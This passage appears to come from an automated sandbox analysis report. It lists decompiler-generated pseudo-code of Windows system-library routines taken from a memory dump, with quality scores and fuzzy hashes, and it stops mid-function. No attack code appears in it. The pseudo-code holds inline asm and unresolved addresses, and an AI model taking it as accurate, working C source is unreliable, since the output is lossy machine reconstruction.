                                                              C-Code - Quality: 59%
                                                              			E01013B7A(void* __ecx) {
                                                              				signed int _v8;
                                                              				char _v12;
                                                              				intOrPtr _v20;
                                                              				intOrPtr _t17;
                                                              				intOrPtr _t26;
                                                              				void* _t35;
                                                              				void* _t38;
                                                              				void* _t41;
                                                              				intOrPtr _t44;
                                                              
                                                              				_t17 =  *0x10d84c4; // 0x0
                                                              				_v12 = 1;
                                                              				_v8 =  *0x10d84c0 * 0x4c;
                                                              				_t41 = __ecx;
                                                              				_t35 = L01004620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x10d84c0 * 0x4c);
                                                              				if(_t35 == 0) {
                                                              					_t44 = 0xc0000017;
                                                              				} else {
                                                              					_push( &_v8);
                                                              					_push(_v8);
                                                              					_push(_t35);
                                                              					_push(4);
                                                              					_push( &_v12);
                                                              					_push(0x6b);
                                                              					_t44 = E0102AA90();
                                                              					_v20 = _t44;
                                                              					if(_t44 >= 0) {
                                                              						E0102FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x10d84c0 * 0xc);
                                                              						_t38 = _t35;
                                                              						if(_t35 < _v8 + _t35) {
                                                              							do {
                                                              								asm("movsd");
                                                              								asm("movsd");
                                                              								asm("movsd");
                                                              								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                                                              							} while (_t38 < _v8 + _t35);
                                                              							_t44 = _v20;
                                                              						}
                                                              					}
                                                              					_t26 =  *0x10d84c4; // 0x0
                                                              					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                                                              				}
                                                              				return _t44;
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9f8bfba75d5d165dd6a1a72e47b0a7d57b5671a23ecd497ea81952368bedebc2
                                                              • Instruction ID: 746281886faf3aa763723254205a8f9f3c6d8d4a0ca24ebd2a0c7dd7b0f96587
                                                              • Opcode Fuzzy Hash: 9f8bfba75d5d165dd6a1a72e47b0a7d57b5671a23ecd497ea81952368bedebc2
                                                              • Instruction Fuzzy Hash: CF21FF72A01109EFC700DF58CD81F9ABBBDFB40358F150069EA48AB252D776ED01CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 80%
                                                              			E01066CF0(void* __edx, intOrPtr _a4, short _a8) {
                                                              				char _v8;
                                                              				char _v12;
                                                              				char _v16;
                                                              				char _v20;
                                                              				char _v28;
                                                              				char _v36;
                                                              				char _v52;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				signed char* _t21;
                                                              				void* _t24;
                                                              				void* _t36;
                                                              				void* _t38;
                                                              				void* _t46;
                                                              
                                                              				_push(_t36);
                                                              				_t46 = __edx;
                                                              				_v12 = 0;
                                                              				_v8 = 0;
                                                              				_v20 = 0;
                                                              				_v16 = 0;
                                                              				if(E01007D50() == 0) {
                                                              					_t21 = 0x7ffe0384;
                                                              				} else {
                                                              					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                                                              				}
                                                              				if( *_t21 != 0) {
                                                              					_t21 =  *[fs:0x30];
                                                              					if((_t21[0x240] & 0x00000004) != 0) {
                                                              						if(E01007D50() == 0) {
                                                              							_t21 = 0x7ffe0385;
                                                              						} else {
                                                              							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                                                              						}
                                                              						if(( *_t21 & 0x00000020) != 0) {
                                                              							_t56 = _t46;
                                                              							if(_t46 == 0) {
                                                              								_t46 = 0xfc5c80;
                                                              							}
                                                              							_push(_t46);
                                                              							_push( &_v12);
                                                              							_t24 = E0101F6E0(_t36, 0, _t46, _t56);
                                                              							_push(_a4);
                                                              							_t38 = _t24;
                                                              							_push( &_v28);
                                                              							_t21 = E0101F6E0(_t38, 0, _t46, _t56);
                                                              							if(_t38 != 0) {
                                                              								if(_t21 != 0) {
                                                              									E01067016(_a8, 0, 0, 0,  &_v36,  &_v28);
                                                              									L01002400( &_v52);
                                                              								}
                                                              								_t21 = L01002400( &_v28);
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              				return _t21;
                                                              			}




















                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 67%
                                                              			E010B070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                              				char _v8;
                                                              				intOrPtr _v11;
                                                              				signed int _v12;
                                                              				intOrPtr _v15;
                                                              				signed int _v16;
                                                              				intOrPtr _v28;
                                                              				void* __ebx;
                                                              				char* _t32;
                                                              				signed int* _t38;
                                                              				signed int _t60;
                                                              
                                                              				_t38 = __ecx;
                                                              				_v16 = __edx;
                                                              				_t60 = E010B07DF(__ecx, __edx,  &_a4,  &_a8, 2);
                                                              				if(_t60 != 0) {
                                                              					_t7 = _t38 + 0x38; // 0x29cd5903
                                                              					_push( *_t7);
                                                              					_t9 = _t38 + 0x34; // 0x6adeeb00
                                                              					_push( *_t9);
                                                              					_v12 = _a8 << 0xc;
                                                              					_t11 = _t38 + 4; // 0x5de58b5b
                                                              					_push(0x4000);
                                                              					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                                                              					E010AAFDE( &_v8,  &_v12);
                                                              					E010B1293(_t38, _v28, _t60);
                                                              					if(E01007D50() == 0) {
                                                              						_t32 = 0x7ffe0380;
                                                              					} else {
                                                              						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                              					}
                                                              					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                              						_t21 = _t38 + 0x3c; // 0xc3595e5f
                                                              						E010A14FB(_t38,  *_t21, _v11, _v15, 0xd);
                                                              					}
                                                              				}
                                                              				return  ~_t60;
                                                              			}














                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 82%
                                                              			E01067794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                                              				intOrPtr _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr _t21;
                                                              				void* _t24;
                                                              				intOrPtr _t25;
                                                              				void* _t36;
                                                              				short _t39;
                                                              				signed char* _t42;
                                                              				unsigned int _t46;
                                                              				void* _t50;
                                                              
                                                              				_push(__ecx);
                                                              				_push(__ecx);
                                                              				_t21 =  *0x10d7b9c; // 0x0
                                                              				_t46 = _a8;
                                                              				_v12 = __edx;
                                                              				_v8 = __ecx;
                                                              				_t4 = _t46 + 0x2e; // 0x2e
                                                              				_t36 = _t4;
                                                              				_t24 = L01004620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                                                              				_t50 = _t24;
                                                              				if(_t50 != 0) {
                                                              					_t25 = _a4;
                                                              					if(_t25 == 5) {
                                                              						L3:
                                                              						_t39 = 0x14b1;
                                                              					} else {
                                                              						_t39 = 0x14b0;
                                                              						if(_t25 == 6) {
                                                              							goto L3;
                                                              						}
                                                              					}
                                                              					 *((short*)(_t50 + 6)) = _t39;
                                                              					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                                                              					_t11 = _t50 + 0x2c; // 0x2c
                                                              					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                                                              					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                                                              					E0102F3E0(_t11, _a12, _t46);
                                                              					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                                                              					if(E01007D50() == 0) {
                                                              						_t42 = 0x7ffe0384;
                                                              					} else {
                                                              						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                              					}
                                                              					_push(_t50);
                                                              					_t19 = _t36 - 0x20; // 0xe
                                                              					_push(0x403);
                                                              					_push( *_t42 & 0x000000ff);
                                                              					E01029AE0();
                                                              					_t24 = L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                                                              				}
                                                              				return _t24;
                                                              			}














                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 96%
                                                              			E0100AE73(intOrPtr __ecx, void* __edx) {
                                                              				intOrPtr _v8;
                                                              				void* _t19;
                                                              				char* _t22;
                                                              				signed char* _t24;
                                                              				intOrPtr _t25;
                                                              				intOrPtr _t27;
                                                              				void* _t31;
                                                              				intOrPtr _t36;
                                                              				char* _t38;
                                                              				signed char* _t42;
                                                              
                                                              				_push(__ecx);
                                                              				_t31 = __edx;
                                                              				_v8 = __ecx;
                                                              				_t19 = E01007D50();
                                                              				_t38 = 0x7ffe0384;
                                                              				if(_t19 != 0) {
                                                              					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                              				} else {
                                                              					_t22 = 0x7ffe0384;
                                                              				}
                                                              				_t42 = 0x7ffe0385;
                                                              				if( *_t22 != 0) {
                                                              					if(E01007D50() == 0) {
                                                              						_t24 = 0x7ffe0385;
                                                              					} else {
                                                              						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                              					}
                                                              					if(( *_t24 & 0x00000010) != 0) {
                                                              						goto L17;
                                                              					} else {
                                                              						goto L3;
                                                              					}
                                                              				} else {
                                                              					L3:
                                                              					_t27 = E01007D50();
                                                              					if(_t27 != 0) {
                                                              						_t27 =  *[fs:0x30];
                                                              						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                                                              					}
                                                              					if( *_t38 != 0) {
                                                              						_t27 =  *[fs:0x30];
                                                              						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                                                              							goto L5;
                                                              						}
                                                              						_t27 = E01007D50();
                                                              						if(_t27 != 0) {
                                                              							_t27 =  *[fs:0x30];
                                                              							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                                                              						}
                                                              						if(( *_t42 & 0x00000020) != 0) {
                                                              							L17:
                                                              							_t25 = _v8;
                                                              							_t36 = 0;
                                                              							if(_t25 != 0) {
                                                              								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                                                              							}
                                                              							_t27 = E01067794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                                                              						}
                                                              						goto L5;
                                                              					} else {
                                                              						L5:
                                                              						return _t27;
                                                              					}
                                                              				}
                                                              			}














                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 93%
                                                              			E0101FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                              				intOrPtr _v8;
                                                              				void* _t19;
                                                              				intOrPtr _t29;
                                                              				intOrPtr _t32;
                                                              				intOrPtr _t35;
                                                              				intOrPtr _t37;
                                                              				intOrPtr* _t40;
                                                              
                                                              				_t35 = __edx;
                                                              				_push(__ecx);
                                                              				_push(__ecx);
                                                              				_t37 = 0;
                                                              				_v8 = __edx;
                                                              				_t29 = __ecx;
                                                              				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                                                              					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                                                              					L3:
                                                              					_t19 = _a4 - 4;
                                                              					if(_t19 != 0) {
                                                              						if(_t19 != 1) {
                                                              							L7:
                                                              							return _t37;
                                                              						}
                                                              						if(_t35 == 0) {
                                                              							L11:
                                                              							_t37 = 0xc000000d;
                                                              							goto L7;
                                                              						}
                                                              						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                                                              							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                                                              							_t35 = _v8;
                                                              						}
                                                              						 *((intOrPtr*)(_t40 + 4)) = _t35;
                                                              						goto L7;
                                                              					}
                                                              					if(_t29 == 0) {
                                                              						goto L11;
                                                              					}
                                                              					_t32 =  *_t40;
                                                              					if(_t32 != 0) {
                                                              						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                                                              						E00FF76E2( *_t40);
                                                              					}
                                                              					 *_t40 = _t29;
                                                              					goto L7;
                                                              				}
                                                              				_t40 = L01004620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                                                              				if(_t40 == 0) {
                                                              					_t37 = 0xc0000017;
                                                              					goto L7;
                                                              				}
                                                              				_t35 = _v8;
                                                              				 *_t40 = 0;
                                                              				 *((intOrPtr*)(_t40 + 4)) = 0;
                                                              				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                                                              				goto L3;
                                                              			}











                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                              • Instruction ID: c78e7c784520d09c61686d49bfc9c96f570e1389658c8cce700a086e2e7ec0d0
                                                              • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                              • Instruction Fuzzy Hash: F421AC72600A42DBD731DF0DC640A66F7E9EB94B10F2080BEE98A87619D738AC05CB80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 54%
                                                              			E0101B390(void* __ecx, intOrPtr _a4) {
                                                              				signed int _v8;
                                                              				signed char _t12;
                                                              				signed int _t16;
                                                              				signed int _t21;
                                                              				void* _t28;
                                                              				signed int _t30;
                                                              				signed int _t36;
                                                              				signed int _t41;
                                                              
                                                              				_push(__ecx);
                                                              				_t41 = _a4 + 0xffffffb8;
                                                              				E01002280(_t12, 0x10d8608);
                                                              				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                                                              				asm("sbb edi, edi");
                                                              				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                                                              				_v8 = _t36;
                                                              				asm("lock cmpxchg [ebx], ecx");
                                                              				_t30 = 1;
                                                              				if(1 != 1) {
                                                              					while(1) {
                                                              						_t21 = _t30 & 0x00000006;
                                                              						_t16 = _t30;
                                                              						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                                                              						asm("lock cmpxchg [edi], esi");
                                                              						if(_t16 == _t30) {
                                                              							break;
                                                              						}
                                                              						_t30 = _t16;
                                                              					}
                                                              					_t36 = _v8;
                                                              					if(_t21 == 2) {
                                                              						_t16 = E010200C2(0x10d8608, 0, _t28);
                                                              					}
                                                              				}
                                                              				if(_t36 != 0) {
                                                              					_t16 = L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                                                              				}
                                                              				return _t16;
                                                              			}












                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b2fbe8356e742b113e024eb89a9628c4f1da6ed42a76232153342e95ebc98d81
                                                              • Instruction ID: 3ff78acabe799d09f763d7d7de7fb86158af8b51dadbd6d740b5a9cf40016207
                                                              • Opcode Fuzzy Hash: b2fbe8356e742b113e024eb89a9628c4f1da6ed42a76232153342e95ebc98d81
                                                              • Instruction Fuzzy Hash: 8B116F333012109BCB199A59CD8156F77A6FBC9730F24817AED96D7380DE355C01C690
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 77%
                                                              			E00FE9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                              				intOrPtr _t33;
                                                              				intOrPtr _t37;
                                                              				intOrPtr _t41;
                                                              				intOrPtr* _t46;
                                                              				void* _t48;
                                                              				intOrPtr _t50;
                                                              				intOrPtr* _t60;
                                                              				void* _t61;
                                                              				intOrPtr _t62;
                                                              				intOrPtr _t65;
                                                              				void* _t66;
                                                              				void* _t68;
                                                              
                                                              				_push(0xc);
                                                              				_push(0x10bf708);
                                                              				E0103D08C(__ebx, __edi, __esi);
                                                              				_t65 = __ecx;
                                                              				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                                                              				if( *(__ecx + 0x24) != 0) {
                                                              					_push( *(__ecx + 0x24));
                                                              					E010295D0();
                                                              					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                                                              				}
                                                              				L6();
                                                              				L6();
                                                              				_push( *((intOrPtr*)(_t65 + 0x28)));
                                                              				E010295D0();
                                                              				_t33 =  *0x10d84c4; // 0x0
                                                              				L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                                                              				_t37 =  *0x10d84c4; // 0x0
                                                              				L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                                                              				_t41 =  *0x10d84c4; // 0x0
                                                              				E01002280(L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x10d86b4);
                                                              				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                                                              				_t46 = _t65 + 0xe8;
                                                              				_t62 =  *_t46;
                                                              				_t60 =  *((intOrPtr*)(_t46 + 4));
                                                              				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                                                              					_t61 = 3;
                                                              					asm("int 0x29");
                                                              					_push(_t65);
                                                              					_t66 = _t61;
                                                              					_t23 = _t66 + 0x14; // 0x8df8084c
                                                              					_push( *_t23);
                                                              					E010295D0();
                                                              					_t24 = _t66 + 0x10; // 0x89e04d8b
                                                              					_push( *_t24);
                                                              					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                                                              					_t48 = E010295D0();
                                                              					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                                                              					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                                                              					return _t48;
                                                              				} else {
                                                              					 *_t60 = _t62;
                                                              					 *((intOrPtr*)(_t62 + 4)) = _t60;
                                                              					 *(_t68 - 4) = 0xfffffffe;
                                                              					E00FE9325();
                                                              					_t50 =  *0x10d84c4; // 0x0
                                                              					return E0103D0D1(L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                                                              				}
                                                              			}
















                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3c589672897b4aa137f7d116fbb58d75c94723b6db86fb7cfeb549ba9ca9d37d
                                                              • Instruction ID: 604bb5b1ba04f83b4333cfe74abdd887f4655444c93407867ec7de39911d599a
                                                              • Opcode Fuzzy Hash: 3c589672897b4aa137f7d116fbb58d75c94723b6db86fb7cfeb549ba9ca9d37d
                                                              • Instruction Fuzzy Hash: 89218731042641EFC722EF68CA00F9AB7B9FF18704F00856CE089876A2CB39E941DB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 90%
                                                              			E01074257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                                                              				intOrPtr* _t18;
                                                              				intOrPtr _t24;
                                                              				intOrPtr* _t27;
                                                              				intOrPtr* _t30;
                                                              				intOrPtr* _t31;
                                                              				intOrPtr _t33;
                                                              				intOrPtr* _t34;
                                                              				intOrPtr* _t35;
                                                              				void* _t37;
                                                              				void* _t38;
                                                              				void* _t39;
                                                              				void* _t43;
                                                              
                                                              				_t39 = __eflags;
                                                              				_t35 = __edi;
                                                              				_push(8);
                                                              				_push(0x10c08d0);
                                                              				E0103D08C(__ebx, __edi, __esi);
                                                              				_t37 = __ecx;
                                                              				E010741E8(__ebx, __edi, __ecx, _t39);
                                                              				E00FFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                              				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                                                              				_t18 = _t37 + 8;
                                                              				_t33 =  *_t18;
                                                              				_t27 =  *((intOrPtr*)(_t18 + 4));
                                                              				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                                                              					L8:
                                                              					_push(3);
                                                              					asm("int 0x29");
                                                              				} else {
                                                              					 *_t27 = _t33;
                                                              					 *((intOrPtr*)(_t33 + 4)) = _t27;
                                                              					_t35 = 0x10d87e4;
                                                              					_t18 =  *0x10d87e0; // 0x0
                                                              					while(_t18 != 0) {
                                                              						_t43 = _t18 -  *0x10d5cd0; // 0xffffffff
                                                              						if(_t43 >= 0) {
                                                              							_t31 =  *0x10d87e4; // 0x0
                                                              							_t18 =  *_t31;
                                                              							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                                                              								goto L8;
                                                              							} else {
                                                              								 *0x10d87e4 = _t18;
                                                              								 *((intOrPtr*)(_t18 + 4)) = _t35;
                                                              								L00FE7055(_t31 + 0xfffffff8);
                                                              								_t24 =  *0x10d87e0; // 0x0
                                                              								_t18 = _t24 - 1;
                                                              								 *0x10d87e0 = _t18;
                                                              								continue;
                                                              							}
                                                              						}
                                                              						goto L9;
                                                              					}
                                                              				}
                                                              				L9:
                                                              				__eflags =  *0x10d5cd0;
                                                              				if( *0x10d5cd0 <= 0) {
                                                              					L00FE7055(_t37);
                                                              				} else {
                                                              					_t30 = _t37 + 8;
                                                              					_t34 =  *0x10d87e8; // 0x0
                                                              					__eflags =  *_t34 - _t35;
                                                              					if( *_t34 != _t35) {
                                                              						goto L8;
                                                              					} else {
                                                              						 *_t30 = _t35;
                                                              						 *((intOrPtr*)(_t30 + 4)) = _t34;
                                                              						 *_t34 = _t30;
                                                              						 *0x10d87e8 = _t30;
                                                              						 *0x10d87e0 = _t18 + 1;
                                                              					}
                                                              				}
                                                              				 *(_t38 - 4) = 0xfffffffe;
                                                              				return E0103D0D1(L01074320());
                                                              			}
















                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 29%
                                                              			E01012397(intOrPtr _a4) {
                                                              				void* __ebx;
                                                              				void* __ecx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				signed int _t11;
                                                              				void* _t19;
                                                              				void* _t25;
                                                              				void* _t26;
                                                              				intOrPtr _t27;
                                                              				void* _t28;
                                                              				void* _t29;
                                                              
                                                              				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                                                              				if( *0x10d848c != 0) {
                                                              					L0100FAD0(0x10d8610);
                                                              					if( *0x10d848c == 0) {
                                                              						E0100FA00(0x10d8610, _t19, _t27, 0x10d8610);
                                                              						goto L1;
                                                              					} else {
                                                              						_push(0);
                                                              						_push(_a4);
                                                              						_t26 = 4;
                                                              						_t29 = E01012581(0x10d8610, 0xfc50a0, _t26, _t27, _t28);
                                                              						E0100FA00(0x10d8610, 0xfc50a0, _t27, 0x10d8610);
                                                              					}
                                                              				} else {
                                                              					L1:
                                                              					_t11 =  *0x10d8614; // 0x0
                                                              					if(_t11 == 0) {
                                                              						_t11 = E01024886(0xfc1088, 1, 0x10d8614);
                                                              					}
                                                              					_push(0);
                                                              					_push(_a4);
                                                              					_t25 = 4;
                                                              					_t29 = E01012581(0x10d8610, (_t11 << 4) + 0xfc5070, _t25, _t27, _t28);
                                                              				}
                                                              				if(_t29 != 0) {
                                                              					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                                                              					 *((char*)(_t29 + 0x40)) = 0;
                                                              				}
                                                              				return _t29;
                                                              			}
















                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 93%
                                                              			E010646A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                                                              				signed short* _v8;
                                                              				unsigned int _v12;
                                                              				intOrPtr _v16;
                                                              				signed int _t22;
                                                              				signed char _t23;
                                                              				short _t32;
                                                              				void* _t38;
                                                              				char* _t40;
                                                              
                                                              				_v12 = __edx;
                                                              				_t29 = 0;
                                                              				_v8 = __ecx;
                                                              				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                                                              				_t38 = L01004620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                                                              				if(_t38 != 0) {
                                                              					_t40 = _a4;
                                                              					 *_t40 = 1;
                                                              					E0102F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                                                              					_t22 = _v12 >> 1;
                                                              					_t32 = 0x2e;
                                                              					 *((short*)(_t38 + _t22 * 2)) = _t32;
                                                              					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                                                              					_t23 = E0101D268(_t38, 1);
                                                              					asm("sbb al, al");
                                                              					 *_t40 =  ~_t23 + 1;
                                                              					L010077F0(_v16, 0, _t38);
                                                              				} else {
                                                              					 *_a4 = 0;
                                                              					_t29 = 0xc0000017;
                                                              				}
                                                              				return _t29;
                                                              			}












                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 42%
                                                              			E00FEC962(char __ecx) {
                                                              				signed int _v8;
                                                              				intOrPtr _v12;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* _t19;
                                                              				char _t22;
                                                              				void* _t26;
                                                              				void* _t27;
                                                              				char _t32;
                                                              				char _t34;
                                                              				void* _t35;
                                                              				void* _t37;
                                                              				intOrPtr* _t38;
                                                              				signed int _t39;
                                                              
                                                              				_t41 = (_t39 & 0xfffffff8) - 0xc;
                                                              				_v8 =  *0x10dd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                                                              				_t34 = __ecx;
                                                              				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                                                              					_t26 = 0;
                                                              					E00FFEEF0(0x10d70a0);
                                                              					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                                                              					if(E0106F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                                                              						L9:
                                                              						E00FFEB70(_t29, 0x10d70a0);
                                                              						_t19 = _t26;
                                                              						L2:
                                                              						_pop(_t35);
                                                              						_pop(_t37);
                                                              						_pop(_t27);
                                                              						return E0102B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                                                              					}
                                                              					_t29 = _t34;
                                                              					_t26 = E0106F1FC(_t34, _t32);
                                                              					if(_t26 < 0) {
                                                              						goto L9;
                                                              					}
                                                              					_t38 =  *0x10d70c0; // 0x0
                                                              					while(_t38 != 0x10d70c0) {
                                                              						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                                                              						_t38 =  *_t38;
                                                              						_v12 = _t22;
                                                              						if(_t22 != 0) {
                                                              							_t29 = _t22;
                                                              							 *0x10db1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                                                              							_v12();
                                                              						}
                                                              					}
                                                              					goto L9;
                                                              				}
                                                              				_t19 = 0;
                                                              				goto L2;
                                                              			}



















                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 87%
                                                              			E010237F5(void* __ecx, intOrPtr* __edx) {
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				signed char _t6;
                                                              				intOrPtr _t13;
                                                              				intOrPtr* _t20;
                                                              				intOrPtr* _t27;
                                                              				void* _t28;
                                                              				intOrPtr* _t29;
                                                              
                                                              				_t27 = __edx;
                                                              				_t28 = __ecx;
                                                              				if(__edx == 0) {
                                                              					E01002280(_t6, 0x10d8550);
                                                              				}
                                                              				_t29 = E0102387E(_t28);
                                                              				if(_t29 == 0) {
                                                              					L6:
                                                              					if(_t27 == 0) {
                                                              						E00FFFFB0(0x10d8550, _t27, 0x10d8550);
                                                              					}
                                                              					if(_t29 == 0) {
                                                              						return 0xc0000225;
                                                              					} else {
                                                              						if(_t27 != 0) {
                                                              							goto L14;
                                                              						}
